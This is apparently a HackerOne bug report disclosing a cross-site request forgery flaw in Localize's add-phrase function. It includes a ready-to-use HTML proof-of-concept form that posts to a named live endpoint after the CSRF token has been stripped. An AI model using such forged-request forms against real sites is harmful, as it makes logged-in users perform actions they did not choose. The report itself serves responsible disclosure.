Localize: CSRF in adding phrase.

ID H1:7962
Type hackerone
Reporter mnz_
Modified 2014-04-19T02:07:56


CSRF is an attack which forces an end user to execute unwanted actions on a web application in which he/she is currently authenticated. With a little help of social engineering (like sending a link via email/chat), an attacker may trick the users of a web application into executing actions of the attacker's choosing.

CSRF HTML Code: <html> <body> <form action="http://www.localize.io/add_phrase/59/languages/3" method="POST"> <input type="hidden" name="add_phrase[type]" value="1" /> <input type="hidden" name="add_phrase[key]" value="asdasd" /> <input type="hidden" name="add_phrase[string]" value="456" /> <input type="submit" value="Submit request" /> </form> </body> </html>

in fact there is a CSRF Token in the form, but i remove that, and i try to submit the request, and it works perfectly. name="CSRFToken"